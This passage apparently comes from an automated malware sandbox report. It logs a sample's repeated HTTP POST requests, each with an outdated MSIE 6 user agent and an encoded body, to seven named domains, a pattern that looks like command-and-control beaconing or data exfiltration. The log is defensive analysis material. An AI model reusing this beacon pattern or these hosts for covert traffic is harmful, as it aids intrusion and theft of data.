70 4b 49 42 6e 6d 49 56 68 43 62 62 6b 42 5a 45 44 4a 7a 55 63 35 44 43 44 72 41 69 7a 39 67 6d 50 73 73 68 57 79 74 6f 47 76 56 32 48 35 4e 2b 59 2f 53 6c 54 69 69 47 36 6e 68 6b 4a 75 31 33 68 65 6e 33 67 65 75 4c 6b 56 53 36 65 4e 69 2b 6c 74 34 6c 4c 2b 6f 36 57 51 35 70 67 65 7a 6c 64 7a 65 74 52 53 6f 64 30 33 5a 2b 6f 74 70 43 79 68 2b 70 39 79 59 61 59 67 42 39 37 67 45 6d 43 50 2f 57 45 56 75 2b 78 54 51 4c 52 38 52 47 41 5a 72 35 6c 42 56 34 76 7a 65 37 42 71 51 2b 30 4f 44 59 58 32 4e 2f 59 64 6b 79 51 30 57 38 34 6e 67 64 2b 76 44 74 44 44 54 50 35 72 6f 49 2f 50 48 4b 59 75 6e 37 75 6e 71 4f 57 75 47 78 75 52 70 4f 47 46 69 39 53 36 71 72 75 55 7a 35 30 72 43 49 53 47 66 55 6e 77 6c 65 49 64 55 53 72 44 42 64 77 31 4d 71 49 37 59 44 6a 5a 61 35 39 55 57 34 63 7a 6b 55 57 38 6b 4b 4f 41 74 38 50 4b 4d 46 6f 66 42 59 55 70 72 33 45 5a 34 73 6c 4b 2f 33 70 4a 57 59 51 6b 79 4d 43 56 2f 4b 56 47 7a 36 59 58 4e 53 2f 2f 31 4d 73 4a 32 34 70 44 70 38 30 68 6a 4d 64 51 58 65 2b 6c 75 77 4c 52 62 35 4a 4c 42 30 30 57 56 76 61 74 39 38 33 58 43 57 54 Data Ascii: hzcvNEizepSc7Od8i74gLLthfhTQd8Bf/HJGwZoRy4gWEAdJY2IhHTtJZH+SwnJYGgvzvuIpFDzJ6i2lfS/Bm88c7jN1s1/rRdRyH6JieIcp3WxL441gDBJgNG6FXpVYk6774NXTFQU6m8zSykzp778Q+7suGT2jO3GtshLrBujVc+T13KL0vcZgMdypKIBnmIVhCbbkBZEDJzUc5DCDrAiz9gmPsshWytoGvV2H5N+Y/SlTiiG6nhkJu13hen3geuLkVS6eNi+lt4lL+o6WQ5pgezldzetRSod03Z+otpCyh+p9yYaYgB97gEmCP/WEVu+xTQLR8RGAZr5lBV4vze7BqQ+0ODYX2N/YdkyQ0W84ngd+vDtDDTP5roI/PHKYun7unqOWuGxuRpOGFi9S6qruUz50rCISGfUnwleIdUSrDBdw1MqI7YDjZa59UW4czkUW8kKOAt8PKMFofBYUpr3EZ4slK/3pJWYQkyMCV/KVGz6YXNS//1MsJ24pDp80hjMdQXe+luwLRb5JLB00WVvat983XCWT
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.olras.comCache-Control: no-cacheData Raw: 78 4a 56 47 52 56 39 42 65 35 54 43 53 68 71 50 76 68 38 45 52 65 68 32 39 47 30 31 30 53 36 6a 41 37 65 74 4f 65 63 78 68 68 62 58 48 31 58 32 4c 31 37 48 47 50 48 55 70 45 69 69 6a 68 38 4d 61 67 42 50 58 2b 32 6f 45 4a 6b 68 42 7a 46 38 73 6f 54 46 56 4d 49 48 78 30 79 57 78 69 31 7a 5a 31 73 71 64 65 64 4c 33 6b 36 39 36 55 75 65 66 6e 47 2b 53 53 42 54 4d 4e 34 66 6c 41 41 36 46 63 30 4e 65 30 64 49 53 34 62 4a 32 33 63 67 76 4b 6a 6b 4d 6c 4c 4d 57 4d 6e 44 2f 7a 37 31 74 69 67 31 4e 6d 77 78 66 2f 66 31 32 37 37 38 50 47 45 39 59 6a 59 53 38 63 58 66 4c 44 48 30 44 67 39 35 77 59 39 6b 62 4d 6b 51 69 50 63 70 41 49 64 4f 6c 64 2b 39 49 57 72 36 59 56 6b 66 66 6f 34 33 59 77 78 48 41 55 6d 63 6c 64 49 46 4d 6d 61 73 65 65 43 76 53 52 56 73 64 72 4b 75 36 68 50 7a 6b 5a 50 78 2f 30 45 4b 61 71 51 67 7a 45 66 77 6d 58 53 6a 64 53 42 71 61 41 6d 65 7a 53 71 32 48 34 63 52 46 52 7a 6b 6f 4d 6e 49 64 59 4b 50 73 35 53 6d 69 32 43 74 4c 48 74 50 74 77 66 6c 53 69 4a 77 47 53 52 79 54 6b 41 2b 52 4f 36 6c 57 4f 6d 4d 75 52 4b 4e 41 45 57 59 4e 64 75 6d 63 50 2f 65 7a 35 55 56 42 66 63 56 6a 2f 41 6c 5a 6c 30 4f 6a 7a 4b 51 52 4a 39 35 68 72 6f 39 4a 66 57 43 6e 55 56 4c 47 56 72 6f 32 4a 56 6e 41 43 74 70 47 39 55 45 62 4c 6d 59 6c 6c 4d 63 76 4b 70 4c 6a 2b 4f 4a 48 64 55 62 54 47 2b 6c 32 57 42 6d 43 50 59 68 30 52 56 72 6c 6b 6f 5a 2b 64 71 48 37 4a 59 6d 6d 32 41 77 33 43 49 72 5a 6f 72 63 68 47 36 41 36 4c 51 64 66 34 4c 76 5a 45 56 78 43 31 55 74 34 6f 31 6d 70 77 74 75 47 78 79 47 53 61 76 45 47 76 38 34 37 6b 6a 49 6a 53 72 4a 57 77 33 70 47 4d 34 78 4b 41 6c 57 7a 50 78 4d 54 35 6b 4c 42 69 42 72 77 39 50 36 54 6b 6a 7a 7a 70 4b 55 6e 66 4e 70 4c 33 56 69 2b 67 3d 3d Data Ascii: xJVGRV9Be5TCShqPvh8EReh29G010S6jA7etOecxhhbXH1X2L17HGPHUpEiijh8MagBPX+2oEJkhBzF8soTFVMIHx0yWxi1zZ1sqdedL3k696UuefnG+SSBTMN4flAA6Fc0Ne0dIS4bJ23cgvKjkMlLMWMnD/z71tig1Nmwxf/f12778PGE9YjYS8cXfLDH0Dg95wY9kbMkQiPcpAIdOld+9IWr6YVkffo43YwxHAUmcldIFMmaseeCvSRVsdrKu6hPzkZPx/0EKaqQgzEfwmXSjdSBqaAmezSq2H4cRFRzkoMnIdYKPs5Smi2CtLHtPtwflSiJwGSRyTkA+RO6lWOmMuRKNAEWYNdumcP/ez5UVBfcVj/AlZl0OjzKQRJ95hro9JfWCnUVLGVro2JVnACtpG9UEbLmYllMcvKpLj+OJHdUbTG+l2WBmCPYh0RVrlkoZ+dqH7JYmm2Aw3CIrZorchG6A6LQdf4LvZEVxC1Ut4o1mpwtuGxyGSavEGv847kjIjSrJWw3pGM4xKAlWzPxMT5kLBiBrw9P6TkjzzpKUnfNpL3Vi+g==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.quadlock.comCache-Control: no-cacheData Raw: 70 68 6b 64 51 63 55 65 65 35 53 73 79 70 4f 2b 37 41 45 76 31 6a 35 48 76 76 6d 54 2b 64 5a 39 79 53 65 57 56 57 65 67 57 6f 31 65 42 64 6b 69 72 51 57 51 5a 57 55 57 49 46 38 39 42 38 67 36 77 32 32 62 64 53 44 79 58 44 39 36 4b 7a 31 68 4a 48 62 6d 68 62 42 58 52 42 62 57 2f 6d 61 35 67 32 76 6b 68 77 4b 79 44 6f 62 69 78 54 51 33 4d 43 31 33 59 48 75 30 34 69 48 59 48 4e 76 6a 65 76 34 50 36 59 58 6e 35 48 6f 55 42 77 54 4d 65 2f 79 30 48 56 33 38 55 36 2f 30 52 44 65 58 64 79 56 4c 59 6b 52 62 35 79 41 6b 4f 63 30 45 35 4c 68 54 79 4a 39 4d 4f 79 2f 4e 4d 72 55 75 55 77 4e 6d 48 79 53 78 6b 36 39 4f 6d 62 48 4a 64 6b 70 36 32 48 46 6e 30 71 39 56 45 66 48 49 70 65 74 31 67 31 53 7a 2f 64 46 6d 41 75 56 49 47 78 6b 36 59 67 78 68 67 34 6a 2f 74 71 76 4c 79 59 74 35 4b 69 6c 2b 33 77 73 50 51 72 4d 35 6d 47 65 45 65 6c 45 58 64 6b 7a 6d 71 69 4f 58 38 67 47 71 63 37 72 41 58 78 49 6a 5a 78 47 2b 4c 67 73 6d 79 78 4f 49 73 67 47 37 49 33 6a 43 33 69 4f 49 35 72 50 43 33 42 4e 35 72 33 47 5a 73 45 56 49 41 63 71 74 44 36 59 75 4a 52 76 6a 62 77 6f 52 58 56 70 59 75 62 77 62 50 58 44 39 68 55 6a 7a 56 4b 63 74 56 45 69 6b 7a 46 59 73 53 33 33 44 56 30 69 4a 50 31 78 52 31 4b 6b 39 6e 47 4c 47 4b 2f 6e 69 6d 62 52 6d 45 49 65 6f 2b 63 72 31 38 64 73 50 31 76 35 2f 4f 34 50 6c 70 61 77 5a 75 64 61 41 56 5a 58 41 32 37 6f 6e 6c 72 2b 77 78 6c 41 73 69 63 35 51 52 44 6c 4e 38 4f 6d 4d 5a 6b 6d 45 35 4c 55 6f 74 4f 34 39 31 79 44 6e 39 52 74 30 6b 53 4b 52 68 34 68 53 72 4a 57 49 70 53 59 41 41 62 4f 73 52 59 4e 70 71 78 67 6e 39 45 78 43 41 63 57 43 47 77 31 57 38 7a 41 77 37 48 35 4c 6f 56 75 49 6a 4d 59 52 34 35 45 56 4b 67 3d 3d Data Ascii: phkdQcUee5SsypO+7AEv1j5HvvmT+dZ9ySeWVWegWo1eBdkirQWQZWUWIF89B8g6w22bdSDyXD96Kz1hJHbmhbBXRBbW/ma5g2vkhwKyDobixTQ3MC13YHu04iHYHNvjev4P6YXn5HoUBwTMe/y0HV38U6/0RDeXdyVLYkRb5yAkOc0E5LhTyJ9MOy/NMrUuUwNmHySxk69OmbHJdkp62HFn0q9VEfHIpet1g1Sz/dFmAuVIGxk6Ygxhg4j/tqvLyYt5Kil+3wsPQrM5mGeEelEXdkzmqiOX8gGqc7rAXxIjZxG+LgsmyxOIsgG7I3jC3iOI5rPC3BN5r3GZsEVIAcqtD6YuJRvjbwoRXVpYubwbPXD9hUjzVKctVEikzFYsS33DV0iJP1xR1Kk9nGLGK/nimbRmEIeo+cr18dsP1v5/O4PlpawZudaAVZXA27onlr+wxlAsic5QRDlN8OmMZkmE5LUotO491yDn9Rt0kSKRh4hSrJWIpSYAAbOsRYNpqxgn9ExCAcWCGw1W8zAw7H5LoVuIjMYR45EVKg==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.rs-ag.comCache-Control: no-cacheData Raw: 30 71 62 70 50 30 4b 31 69 35 53 42 4d 66 74 42 4e 58 4d 78 4a 63 57 4c 48 69 46 53 59 67 53 4b 6c 69 2f 62 33 4a 56 31 55 73 4d 75 66 61 6e 76 48 4f 30 51 45 54 56 78 6e 34 5a 69 33 54 6b 4f 36 72 47 65 70 35 5a 30 58 78 53 75 4b 58 5a 39 56 58 71 6f 6b 43 68 4d 4f 52 44 66 47 49 4b 61 35 50 67 47 35 4d 53 69 31 6f 42 54 55 39 78 55 30 38 53 43 32 44 46 33 56 2f 4c 59 76 54 37 39 78 64 31 4e 4b 74 65 38 36 76 53 57 75 4a 38 53 44 56 53 38 33 4d 63 6e 78 34 36 73 48 66 6c 66 46 4c 64 64 6a 61 6e 34 35 7a 50 45 55 43 53 6b 62 32 74 52 44 51 31 75 68 46 70 76 34 62 54 4c 4b 59 4d 45 30 50 76 32 4d 4e 6f 67 66 78 4a 30 41 7a 46 49 38 32 30 55 5a 4f 63 6a 44 33 55 75 50 6f 59 6c 2b 68 65 4a 7a 37 79 63 75 4e 4f 59 6e 4f 4d 36 6b 70 6d 4e 4e 7a 49 2f 41 79 7a 59 65 73 41 4c 50 41 6a 4d 35 68 66 2f 48 2f 4b 45 50 4e 49 6a 42 65 32 63 41 64 49 45 5a 61 69 4b 55 35 47 65 64 50 41 31 2b 31 4a 37 50 79 57 33 78 63 4f 63 5a 41 37 56 35 63 2b 42 73 41 4c 6e 4f 71 55 47 37 38 77 6c 6a 58 4a 46 33 56 43 56 5a 43 48 4a 7a 76 31 49 4f 75 6b 41 48 63 2b 73 35 71 74 37 77 5a 7a 4c 6b 54 4e 64 38 4a 6d 35 46 5a 35 6e 34 4d 6b 6c 6f 67 6c 74 4a 50 59 4f 4d 47 48 2b 76 49 74 59 42 30 47 42 50 35 61 64 33 6e 6b 69 4a 6a 41 30 2b 61 7a 55 44 61 7a 59 42 44 2f 63 6f 52 34 55 46 78 43 38 46 58 62 4c 73 47 43 58 52 39 4f 6b 30 4e 57 58 49 45 33 4e 58 45 44 33 32 59 57 70 48 32 36 37 69 42 30 75 65 31 59 41 79 72 69 7a 6f 54 7a 4c 57 38 4f 31 51 4a 44 77 39 6f 38 37 59 6e 68 79 43 58 76 33 38 67 71 33 6f 38 54 49 53 33 77 77 6e 57 76 69 6e 4f 46 2f 6c 56 37 52 70 51 44 43 59 6a 44 41 4c 4b 30 78 71 71 4c 2b 55 68 79 67 56 55 6b 3d Data Ascii: 0qbpP0K1i5SBMftBNXMxJcWLHiFSYgSKli/b3JV1UsMufanvHO0QETVxn4Zi3TkO6rGep5Z0XxSuKXZ9VXqokChMORDfGIKa5PgG5MSi1oBTU9xU08SC2DF3V/LYvT79xd1NKte86vSWuJ8SDVS83Mcnx46sHflfFLddjan45zPEUCSkb2tRDQ1uhFpv4bTLKYME0Pv2MNogfxJ0AzFI820UZOcjD3UuPoYl+heJz7ycuNOYnOM6kpmNNzI/AyzYesALPAjM5hf/H/KEPNIjBe2cAdIEZaiKU5GedPA1+1J7PyW3xcOcZA7V5c+BsALnOqUG78wljXJF3VCVZCHJzv1IOukAHc+s5qt7wZzLkTNd8Jm5FZ5n4MklogltJPYOMGH+vItYB0GBP5ad3nkiJjA0+azUDazYBD/coR4UFxC8FXbLsGCXR9Ok0NWXIE3NXED32YWpH267iB0ue1YAyrizoTzLW8O1QJDw9o87YnhyCXv38gq3o8TIS3wwnWvinOF/lV7RpQDCYjDALK0xqqL+UhygVUk=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.alteor.clCache-Control: no-cacheData Raw: 70 61 69 75 2b 46 79 31 6b 5a 52 57 2f 70 58 42 68 39 45 54 6a 4f 2f 77 7a 61 68 30 64 65 32 57 55 4c 53 6a 51 42 68 42 65 74 59 34 4c 6a 7a 4a 50 5a 6f 68 74 4c 76 67 36 49 55 66 7a 31 6d 45 79 33 2b 51 38 38 38 35 64 58 6d 63 6b 46 67 51 38 30 6a 77 71 36 6b 75 4c 6b 70 33 49 56 61 4d 78 66 74 4e 71 4d 43 58 66 49 71 46 59 31 71 66 34 45 74 34 4c 6a 34 37 53 6b 37 56 68 71 71 34 4e 4b 7a 4c 58 38 63 54 44 65 61 43 67 45 30 6f 43 4d 56 7a 79 67 4c 6d 6b 6a 30 77 49 66 51 4b 46 67 31 6d 69 52 32 34 57 45 30 6b 57 75 47 45 6c 4a 31 62 55 33 43 77 76 44 32 4d 62 46 38 67 74 42 62 30 75 76 62 57 68 39 44 35 58 63 32 77 36 39 36 5a 2f 62 64 46 46 76 77 49 38 30 70 61 2f 70 62 55 48 33 45 4e 50 34 6c 4f 39 73 52 57 35 6a 50 67 36 76 65 6d 37 4b 6e 76 74 52 6f 65 74 2b 44 34 54 35 45 67 77 77 74 75 6c 31 2f 4e 32 49 46 6e 52 48 6a 57 4d 73 2b 67 73 51 6a 50 37 2b 50 46 65 48 65 4e 73 72 77 61 6c 42 4d 2f 41 47 46 71 69 68 63 4a 39 34 73 52 4a 39 51 61 73 50 63 57 47 4a 45 45 69 44 44 6e 48 33 62 36 5a 4e 77 4b 56 43 51 58 55 2f 66 6b 4c 48 50 31 38 79 42 34 74 6a 32 65 31 33 66 6f 34 44 35 63 52 4a 56 53 78 58 39 78 6d 61 67 71 5a 6f 43 57 71 54 55 4c 36 6d 6b 67 54 31 4e 59 71 70 61 4c 48 74 5a 6c 76 67 69 44 2b 4f 30 69 78 74 47 49 76 33 46 73 79 75 75 33 6c 4d 65 4f 51 68 55 36 59 64 46 44 35 37 49 71 58 4d 55 72 72 6f 4c 47 69 58 4b 33 4b 6e 37 59 62 65 41 79 7a 4c 52 6a 66 65 6e 6c 2f 51 75 79 43 59 6f 39 42 51 42 62 31 6b 32 62 50 36 33 4d 65 31 34 37 31 45 75 39 61 55 6a 4b 65 61 6f 7a 55 54 46 5a 79 62 78 79 37 68 2f 6f 63 62 32 68 33 57 78 32 32 4a 37 72 6d 7a 62 42 78 79 67 36 4d 5a 52 63 58 73 43 72 48 38 31 61 6a 71 71 2b 42 73 6e 49 47 78 30 30 45 69 65 41 39 73 4f 36 52 57 36 77 52 66 52 52 39 79 68 32 4e 67 3d 3d Data Ascii: paiu+Fy1kZRW/pXBh9ETjO/wzah0de2WULSjQBhBetY4LjzJPZohtLvg6IUfz1mEy3+Q8885dXmckFgQ80jwq6kuLkp3IVaMxftNqMCXfIqFY1qf4Et4Lj47Sk7Vhqq4NKzLX8cTDeaCgE0oCMVzygLmkj0wIfQKFg1miR24WE0kWuGElJ1bU3CwvD2MbF8gtBb0uvbWh9D5Xc2w696Z/bdFFvwI80pa/pbUH3ENP4lO9sRW5jPg6vem7KnvtRoet+D4T5Egwwtul1/N2IFnRHjWMs+gsQjP7+PFeHeNsrwalBM/AGFqihcJ94sRJ9QasPcWGJEEiDDnH3b6ZNwKVCQXU/fkLHP18yB4tj2e13fo4D5cRJVSxX9xmagqZoCWqTUL6mkgT1NYqpaLHtZlvgiD+O0ixtGIv3Fsyuu3lMeOQhU6YdFD57IqXMUrroLGiXK3Kn7YbeAyzLRjfenl/QuyCYo9BQBb1k2bP63Me1471Eu9aUjKeaozUTFZybxy7h/ocb2h3Wx22J7rmzbBxyg6MZRcXsCrH81ajqq+BsnIGx00EieA9sO6RW6wRfRR9yh2Ng==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valdal.comCache-Control: no-cacheData Raw: 35 61 38 62 6d 6c 6a 7a 6c 70 53 53 67 43 59 41 57 31 36 6d 73 45 74 73 71 73 45 67 59 55 4b 2f 44 44 53 6c 4a 73 42 48 47 55 46 47 6d 54 6c 7a 54 52 4b 58 5a 59 77 5a 31 2f 78 38 49 30 6c 43 6a 6f 64 62 76 36 39 63 55 32 7a 67 66 43 66 65 64 61 69 50 6b 77 2f 36 63 69 7a 4b 36 42 4c 68 4d 72 48 73 70 36 36 4d 37 71 64 6d 4d 71 76 6d 47 39 78 57 45 4a 66 30 6d 72 72 34 57 76 6d 47 4b 73 31 5a 69 6d 38 5a 79 72 42 77 38 7a 77 64 44 6f 48 2b 50 71 67 7a 4c 72 41 6c 53 73 31 31 6b 79 74 66 52 30 44 62 51 62 39 78 4f 6c 78 2f 55 78 44 49 4e 41 32 4b 65 70 4f 75 41 4c 71 53 38 4a 49 4b 6a 48 63 32 67 41 55 61 42 2b 77 50 2b 47 53 7a 39 33 76 2b 4c 42 57 61 4c 54 6b 77 4d 6d 38 67 6a 34 57 4b 66 4a 33 71 6b 46 6f 61 6f 57 68 68 44 69 35 53 47 71 73 66 7a 78 6a 37 6c 7a 68 77 4a 48 56 46 2b 51 4a 41 76 43 70 6b 58 6e 75 6a 44 30 72 47 4b 79 57 71 78 5a 4c 50 38 77 73 73 47 79 5a 73 46 32 70 6e 4a 75 33 4c 34 75 66 51 45 49 50 62 54 4d 66 76 47 42 68 71 76 59 62 49 53 55 42 49 75 71 6f 77 2f 66 44 48 53 4a 7a 4d 4e 51 6e 31 78 53 6f 4c 6d 76 65 38 78 56 4d 6b 75 4b 4f 49 51 63 50 47 44 75 43 76 76 4a 68 2f 36 30 62 76 75 53 74 34 53 4c 7a 35 35 4a 4f 50 4a 6b 50 6d 72 44 75 4d 56 32 76 6c 42 6f 54 72 46 6e 66 4f 61 54 4b 66 4b 47 5a 78 56 4f 56 44 7a 65 6f 4f 51 53 58 31 31 6f 4a 44 54 67 56 4d 54 77 4e 7a 6f 79 70 74 55 4a 4e 51 76 59 7a 6f 50 4c 61 6c 76 58 70 39 44 58 42 32 41 2b 35 45 43 4c 49 51 65 55 48 52 34 52 67 50 4a 34 6f 41 4c 42 43 6c 38 6c 6a 53 38 36 6f 67 77 4e 2f 5a 50 6a 79 42 58 50 71 77 53 6c 71 39 6d 36 49 6b 30 38 45 31 43 6b 77 73 42 68 6f 67 5a 69 64 69 70 61 66 65 6e 72 32 30 56 58 44 6d 35 64 54 34 33 48 4b 41 72 4b 49 43 54 71 35 76 68 79 48 33 39 4a 69 32 71 45 76 6e 45 6b 48 47 72 78 77 4f 54 4f 31 61 68 31 58 6a Data Ascii: 5a8bmljzlpSSgCYAW16msEtsqsEgYUK/DDSlJsBHGUFGmTlzTRKXZYwZ1/x8I0lCjodbv69cU2zgfCfedaiPkw/6cizK6BLhMrHsp66M7qdmMqvmG9xWEJf0mrr4WvmGKs1Zim8ZyrBw8zwdDoH+PqgzLrAlSs11kytfR0DbQb9xOlx/UxDINA2KepOuALqS8JIKjHc2gAUaB+wP+GSz93v+LBWaLTkwMm8gj4WKfJ3qkFoaoWhhDi5SGqsfzxj7lzhwJHVF+QJAvCpkXnujD0rGKyWqxZLP8wssGyZsF2pnJu3L4ufQEIPbTMfvGBhqvYbISUBIuqow/fDHSJzMNQn1xSoLmve8xVMkuKOIQcPGDuCvvJh/60bvuSt4SLz55JOPJkPmrDuMV2vlBoTrFnfOaTKfKGZxVOVDzeoOQSX11oJDTgVMTwNzoyptUJNQvYzoPLalvXp9DXB2A+5ECLIQeUHR4RgPJ4oALBCl8ljS86ogwN/ZPjyBXPqwSlq9m6Ik08E1CkwsBhogZidipafenr20VXDm5dT43HKArKICTq5vhyH39Ji2qEvnEkHGrxwOTO1ah1Xj
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.baijaku.comCache-Control: no-cacheData Raw: 52 68 30 45 51 4b 55 56 65 35 51 6b 2b 47 67 43 54 4d 70 72 37 68 36 39 63 42 66 7a 61 56 59 44 71 64 77 31 33 55 47 34 47 4c 52 2f 6c 4b 32 68 58 4f 30 74 42 4b 30 58 67 4b 6b 35 69 47 41 6a 33 58 53 51 62 7a 38 61 72 33 68 51 32 42 59 78 4e 71 2f 6d 61 6b 66 35 6e 57 41 63 7a 71 68 74 36 72 76 4b 32 6a 4a 33 33 6c 62 44 2b 2f 65 47 67 39 76 62 50 41 4c 7a 50 7a 57 50 2f 41 2b 36 67 58 42 61 4a 36 74 6f 2f 6e 6f 2b 52 69 2b 53 73 50 30 50 6f 50 66 55 2b 45 4b 4c 67 31 55 33 65 34 69 4d 4a 32 61 45 37 4c 46 42 37 4c 36 78 61 41 52 79 79 6d 72 65 4b 36 42 6b 32 58 77 71 4a 77 63 6b 33 34 31 6d 4c 59 62 4a 61 51 74 55 6d 42 78 51 71 34 46 55 43 61 6c 70 39 4d 36 6e 37 74 66 61 5a 46 41 6d 42 2f 50 70 56 33 2b 69 70 44 32 42 51 75 47 34 30 6a 49 33 78 41 51 47 66 67 69 70 58 56 42 53 67 51 61 7a 6a 49 38 6e 36 61 32 73 6c 76 54 4b 51 7a 62 79 33 73 55 39 39 57 30 36 36 68 2b 77 50 79 6f 4e 74 31 41 2f 41 6a 70 46 53 6c 31 52 4d 2f 45 31 7a 4d 64 34 30 33 70 54 55 69 75 4d 49 64 54 68 74 61 6b 59 56 2f 63 56 52 48 79 6e 46 6f 47 76 6e 65 72 54 67 43 7a 2f 71 37 46 76 50 4f 43 6c 7a 37 59 69 35 61 76 54 56 74 4c 58 30 44 67 75 2f 78 62 39 79 4b 74 39 59 56 65 2b 6c 79 70 55 4a 66 67 73 36 51 58 6c 68 57 51 63 33 50 37 58 54 70 67 74 4b 45 52 4c 54 2b 34 49 68 6b 46 4e 77 65 6c 6b 48 37 35 6b 58 6f 4d 41 5a 4b 46 2f 4f 36 64 6d 72 35 39 58 2b 45 4c 76 6e 68 30 58 52 4b 6e 44 6d 74 75 78 49 54 77 38 57 31 33 34 71 42 43 32 50 47 71 6a 33 54 75 48 61 69 31 79 34 67 71 4a 70 4d 65 4d 61 69 2f 33 70 62 6f 37 2f 7a 47 61 4b 66 61 50 43 41 37 44 79 78 74 4a 79 41 50 63 4c 61 35 31 55 50 2f 70 64 61 6d 79 30 7a 66 6c 6d 34 30 56 76 63 7a 47 52 76 35 55 68 78 2f 48 6b 49 49 7a 7a 6c 55 3d Data Ascii: Rh0EQKUVe5Qk+GgCTMpr7h69cBfzaVYDqdw13UG4GLR/lK2hXO0tBK0XgKk5iGAj3XSQbz8ar3hQ2BYxNq/makf5nWAczqht6rvK2jJ33lbD+/eGg9vbPALzPzWP/A+6gXBaJ6to/no+Ri+SsP0PoPfU+EKLg1U3e4iMJ2aE7LFB7L6xaARyymreK6Bk2XwqJwck341mLYbJaQtUmBxQq4FUCalp9M6n7tfaZFAmB/PpV3+ipD2BQuG40jI3xAQGfgipXVBSgQazjI8n6a2slvTKQzby3sU99W066h+wPyoNt1A/AjpFSl1RM/E1zMd403pTUiuMIdThtakYV/cVRHynFoGvnerTgCz/q7FvPOClz7Yi5avTVtLX0Dgu/xb9yKt9YVe+lypUJfgs6QXlhWQc3P7XTpgtKERLT+4IhkFNwelkH75kXoMAZKF/O6dmr59X+ELvnh0XRKnDmtuxITw8W134qBC2PGqj3TuHai1y4gqJpMeMai/3pbo7/zGaKfaPCA7DyxtJyAPcLa51UP/pdamy0zflm40VvczGRv5Uhx/HkIIzzlU=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pr-park.comCache-Control: no-cacheData Raw: 50 2b 64 79 52 32 39 54 65 35 51 6c 71 4c 5a 62 6a 6d 72 48 44 33 67 6a 2f 74 65 46 74 48 32 36 45 78 71 54 59 39 59 36 79 4d 64 61 66 6b 61 73 69 6c 47 39 7a 61 74 49 36 67 2b 56 78 35 79 54 46 33 69 38 78 66 50 66 31 69 64 6a 34 37 71 69 61 4a 43 44 73 6d 30 65 50 53 67 39 66 61 33 68 4e 38 4e 35 45 30 46 48 6e 68 65 70 4d 53 4f 53 53 4f 6c 51 68 4b 46 41 33 47 65 2f 37 68 63 6f 4f 79 76 6b 47 6d 2b 36 57 31 65 45 54 58 53 70 35 43 43 46 69 62 36 78 2b 54 53 36 59 73 39 7a 34 74 54 4a 33 4a 42 56 35 51 71 72 30 4b 63 69 46 53 61 44 51 48 71 72 47 64 56 4c 46 67 6f 51 70 68 4a 59 66 39 53 4f 4a 4a 57 44 4c 6f 41 36 39 37 66 78 36 59 55 6b 34 6a 75 76 68 69 6a 33 78 56 50 69 34 4c 42 2b 44 6a 69 30 79 70 44 46 43 63 67 4c 2b 61 2f 6e 4a 6a 4e 4e 7a 47 4f 50 4e 70 65 63 36 75 68 7a 6d 33 72 72 5a 61 53 46 32 50 44 51 78 6d 4c 4f 46 53 51 38 45 34 76 37 4b 70 31 35 69 44 76 46 54 38 43 53 58 52 35 33 62 42 4a 30 70 55 45 6c 51 39 7a 70 6f 4f 5a 4e 35 58 5a 47 6f 31 57 48 47 6a 65 67 74 4b 37 54 78 55 6f 69 52 31 74 79 30 31 4a 32 54 4d 59 55 64 58 45 77 74 6a 31 62 39 65 6b 58 51 36 33 65 52 46 61 32 33 49 74 49 74 58 30 52 45 72 43 36 46 48 5a 73 57 2b 4e 49 4d 76 39 54 67 7a 62 72 65 46 39 50 33 73 79 35 2f 68 54 66 71 39 65 4b 4c 4f 53 66 79 4c 65 54 44 46 59 49 39 35 55 65 74 63 6c 67 5a 61 44 48 72 6d 44 77 4c 6b 51 67 64 4e 53 36 67 73 52 43 47 6f 45 37 34 6d 54 71 33 51 57 47 61 73 77 63 4d 45 2b 42 62 41 54 49 2b 64 48 71 6f 63 48 6b 6d 67 4f 63 38 77 67 33 68 4a 62 34 6b 57 4e 61 62 74 70 77 42 35 4f 78 4b 4c 39 58 56 4e 42 74 4b 35 6b 59 73 41 42 56 78 70 4d 37 6a 31 74 64 5a 2b 67 36 44 7a 6e 4b 64 2f 66 7a 5a 41 3d 3d Data Ascii: P+dyR29Te5QlqLZbjmrHD3gj/teFtH26ExqTY9Y6yMdafkasilG9zatI6g+Vx5yTF3i8xfPf1idj47qiaJCDsm0ePSg9fa3hN8N5E0FHnhepMSOSSOlQhKFA3Ge/7hcoOyvkGm+6W1eETXSp5CCFib6x+TS6Ys9z4tTJ3JBV5Qqr0KciFSaDQHqrGdVLFgoQphJYf9SOJJWDLoA697fx6YUk4juvhij3xVPi4LB+Dji0ypDFCcgL+a/nJjNNzGOPNpec6uhzm3rrZaSF2PDQxmLOFSQ8E4v7Kp15iDvFT8CSXR53bBJ0pUElQ9zpoOZN5XZGo1WHGjegtK7TxUoiR1ty01J2TMYUdXEwtj1b9ekXQ63eRFa23ItItX0RErC6FHZsW+NIMv9TgzbreF9P3sy5/hTfq9eKLOSfyLeTDFYI95UetclgZaDHrmDwLkQgdNS6gsRCGoE74mTq3QWGaswcME+BbATI+dHqocHkmgOc8wg3hJb4kWNabtpwB5OxKL9XVNBtK5kYsABVxpM7j1tdZ+g6DznKd/fzZA==
